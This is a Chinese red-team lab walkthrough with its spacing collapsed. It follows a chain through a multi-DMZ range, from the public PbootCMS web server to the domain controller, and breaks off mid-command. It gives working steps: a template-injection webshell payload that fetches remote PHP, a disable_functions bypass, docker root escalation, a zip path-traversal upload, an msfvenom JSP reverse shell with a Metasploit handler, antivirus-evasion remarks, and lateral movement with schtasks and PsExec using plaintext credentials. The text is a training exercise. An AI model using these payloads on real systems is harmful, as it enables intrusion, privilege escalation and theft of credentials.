暗月实战项目八FBI渗透高度安全的内网

作者moonsec1.项目八FBI简介 22.靶场搭建 33.信息收集 73.1.masscan端口扫描 73.2.nmap端口扫描与探查 83.3.端口信息整理 93.4.绑定域名hosts 94.测试BOOTCMS安全 104.1.查看cms版本 104.2.下载备份文件 114.2.1.下载SQLITE数据库文件 114.3.Sqlitebrowser读取数据库密文 114.4.登录后台拿WEBSHELL 125.绕过宝塔disable_functions 136.通过密钥登录SSH 157.利用docker提权root 168.渗透内网WEB服务器 178.1.1.在cf1安装nmap对内网进行主机发现 178.1.2.nmap扫主机端口 178.2.登录后台GETHSELL 198.3.metasploit生成jspshell 218.4.生成免杀bypassAV 229.对tomcat-web内网服务器信息收集 259.1.MSF后门Bypassdefender 269.2.防火墙拦截 279.3.ipc空链接访问FILESERVER服务器 2710.metasploitshellcode免杀过defender和360 2710.1.开启tomcat服务器远程终端 2810.2.绕过CredSSP错误信息 2810.3.破解tomcat服务器管理员hash 2911.添加ipsec入站规则.............................................................................................3011.1.sc复制文件到文件服务器 3011.2.at命令执行文件 3011.3.schtasks命令执行失败 3111.4.Metasploit反像连接session 3111.5.Cobaltsctike反向连接后门 3212.对ad(域)网段进行信息收集 3412.1.Nmap跨网段扫描AD域控端口 37Meterperter添加路由 3712.2.Impacketsecretsdump获取域控哈希 3912.3.Impacketsmbexec.py登录域控 4012.4.得到最终得flag 4113.关注 4114.培训网站 42本次靶场是一个高度安全的域控环境，存在多个防火墙，所以存在多个dmz，能有效隔离保护各个工作区。红队测试人员需要从互联网从对外网WEB服务器进行测试再进入内网服务器，进行资产收集，再渗透核心区域，打穿AD域控，拿到域控的权限。本次靶场测试用到很多内网穿透技术，绕过杀软等红队技术。2.靶场搭建Ubuntu18.04选择桥接Tomcat-web文件服务器windwosserver2016WindowsServer2019-DC3.信息收集3.1.masscan端口扫描sudomasscan--ports0-6553521--rate=500Scanning1hosts[65536ports/host]Discoveredopenport22/tcpon21Discoveredopenport8888/tcpon21Discoveredopenport80/tcpon21Discoveredopenport3306/tcpon21Discoveredopenport21/tcpon21Discoveredopenport888/tcpon213.2.nmap端口扫描与探查sudonmap-sS-p1-65535-v21-oAall-port详细版本信息sudonmap-sC-A-p21,22,80,888,3306,88821-oAport-versionPORTSTATESERVICEVERSION21/tcpopenftpPure-FTPd|ssl-cert:Subject:commonName=99/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN|Notvalidbefore:2020-10-28T04:54:10|_Notvalidafter:2030-07-28T04:54:10|_ssl-date:TLSrandomnessdoesnotrepresenttime22/tcpopensshOpenSSH7.6p1Ubuntu4ubuntu0.3(UbuntuLinux;protocol2.0)|ssh-hostkey:||2048de:fe:58:1c:ed:ef:1d:4f:56:9e:b8:1e:71:4d:86:70(RSA)256dc:5b:05:fa:fc:87:d5:f7:97:0a:13:04:fa:23:f0:9b(ECDSA)|_25647:ac:04:b5:4e:1d:a4:c9:c7:b0:7e:55:dd:26:96:2a(ED25519)80/tcpopenhttpApachehttpd|_http-server-header:Apache|_http-title:\xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9888/tcpopenhttpApachehttpd|_http-server-header:Apache|_http-title:403Forbidden3306/tcpopenmysqlMySQL(unauthorized)MACAddress:00:0C:29:98:32:C7(VMware)Warning:OSScanresultsmaybeunreliablebecausewecouldnotfindatleast1openand1closedportAggressiveOSguesses:Linux2.6.32(96%),Linux3.2-4.9(96%),Linux2.6.32-3.10(96%),Linux3.4-3.10(95%),Linux3.1(95%),Linux3.2(95%),AXIS210Aor211NetworkCamera(Linux2.6.17)(94%),SynologyDiskStationManager5.2-5644(94%),NetgearRAIDiator4.2.28(94%),Linux2.6.32-2.6.35(94%)NoexactOSmatchesforhost(testconditionsnon-ideal).NetworkDistance:1hopServiceInfo:Host:0b842aa5.phpmyadmin;OS:Linux;CPE:cpe:/o:linux:linux_kernelTRACEROUTEHOPRTTADDRESS10.75ms213.3.端口信息整理端口版本信息21Pure-FTPd22OpenSSH7.6p1Ubuntu4ubuntu0.3(UbuntuLinux;protocol2.0默认页面宝塔套件信息888403Forbidden8888宝塔后台登录提示3306mysql3.4.绑定域名hosts访问IP根据提示绑定到21sudovi/etc/hosts访问4.1.查看cms版本cms的渗透思路确定cms版本查看升级说明特别是漏洞公告然后进行文件对比定位漏洞分析漏洞与补丁/doc/ChangeLog.txt4.2.下载备份文件用备份扫描器获取备份文件/config.tar.gz/config/database.php~Bootcms默认数据库是sqlite默认下载data/pbootcms.db查看config.php发现默认db位置已经修改data/c6613b090db86e60916afb3af6f923d2.db4.3.Sqlitebrowser读取数据库密文sqlitebrowserc6613b090db86e60916afb3af6f923d2.dbCMD5解密密文是admin7788账号admin14e1b600b1fd579f47433b88e8d85291admin77884.4.登录后台拿WEBSHELL在公司信息填写{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['2','.php']),implode('',['<?phpfile_','put_','contents(','"moon.php",','file','_get_','contents("','http://80/2.txt"))?>'])))}!!!{/pboot:if}在本地生成一个2.php文件再去访问2.php会根目录下生成moon.phpdisable_functions利用php7-backtrace-bypass/mm0r1/exploits发现存在用户cf1:x:1000:1000:CF1,,,:/home/cf1:/bin/bash复制私钥id_rsa设置权限chmod600id_rsassh-iid_rsacf1@192.168.0.121dockerrun-v/etc:/mnt-italpineopensslpasswd-1--saltmoonsec$1$moonsec$.VXUP/Jd9iJIiqrZv/vyj1往passwd增加用户信息sumoonsec切换用户即可获取root权限8.渗透内网WEB服务器nmap-sn192.168.0.0/24-T4对内网整个段主机发现8.1.2.nmap扫主机端口root@08:/tmp#nmap-F24StartingNmap7.60()at2020-11-0712:20CSTNmapscanreportfor24Hostisup(-0.15slatency).Notshown:98filteredportsPORTSTATESERVICE3306/tcpopenmysql8080/tcpopenhttp-proxyMACAddress:00:0C:29:E7:BD:FC(VMware)8.2.登录后台GETHSELL后台弱口令12345624:8080/cmscp/创建穿越漏洞压缩文件importzipfileif__name__=="__main__":try:binary=b'<script>alert("helloworld")</script>'zipFile=zipfile.ZipFile("test5.zip","a",zipfile.ZIP_DEFLATED)info=zipfile.ZipInfo("test5.zip")zipFile.writestr("../../../moonsec.html",binary)zipFile.close()exceptIOErrorase:raisee将war文件后门加入目录压缩包内上传文件解压后没任何文件生成估计被杀软拦截了。项目可以过杀软的/SecurityRiskAdvisors上传后解压自动解压到http://192.168.0.124:8080/cmd/cmd.jsp新建html引用加载代码<scripttype="text/javascript"src="a.js"></script>能够执行命令了但是执行其他命令失败上传文件也失败8.3.metasploit生成jspshell网上很多war都被系统自带的杀软查刚好发现msf自带得jsp可以绕过。msfvenom-pjava/jsp_shell_reverse_tcpLHOST=192.168.0.180LPORT=8888-fraw>shell.jsp创建文件夹WEB-INFweb.xml文件内容<?xmlversion="1.0"encoding="ISO-8859-1"?><web-appxmlns="/xml/ns/j2ee"xmlns:xsi="/2001/XMLSchema-instance"xsi:schemaLocation="/xml/ns/j2ee/xml/ns/j2ee/web-app_2_4.xsd"version="2.4"><display-name>Main</display-name><description>Shell</description><servlet><servlet-name>shell</servlet-name><jsp-file>/shell.jsp</jsp-file></servlet><servlet-mapping><servlet-name>shell</servlet-name><url-pattern>/shell</url-pattern></servlet-mapping></web-app>Jar-cvfshell.war.shell.jsp包成war包Metasploit监听jspmsf5>useexploit/multi/handler[*]Usingconfiguredpayloadgeneric/shell_reverse_tcpmsf5exploit(multi/handler)>setpayloadjava/jsp_shell_reverse_tcpmsf5exploit(multi/handler)>setlhost80lhost=>80msf5exploit(multi/handler)>setlport8888lport=>8888msf5exploit(multi/handler)>setshellcmd.exeshell=>cmd.exemsf5exploit(multi/handler)>exploit得到seesion权限是管理员8.4.生成免杀bypassAV简单收集一下进行发现存在数个杀软exe目前可以过defender和360全套但是执行没有返回shell估计是被行为拦截了。研究了一下过了9.对tomcat-web内网服务器信息收集内网段存活主机9.1.MSF后门Bypassdefender现在可以在metasploit下操作了添加路由开启socks4a9.2.防火墙拦截nmap对28对其端口扫描发现只允许开放445端口可以访问到文件服务器。er出现这种情况用同样版本的或者是win2016的主机链接就能解决11.添加ipsec入站规则在添加规则之前要登录系统把360安全卫士关掉，不然会进行netsh拦截shellnetshinterfaceportproxyaddv4tov4listenport=7788connectaddress=30connectport=7788查看规则netshinterfaceportproxyshowall11.1.sc复制文件到文件服务器查看时间nettime\\28执行任务shellattime\\10.10.1.12822:59:00c:/windows/temp/rve.exeat命令已经没用chtasksshellSCHTASKS/Create/S28/uadministrator/pQWEasd123/SCONCE/ST23:40/TNtest1/TRc:\windows\temp\rve.exe/RUsystemPsExec.exe\\28-uadministrator-pQWEasd123-ic:\\w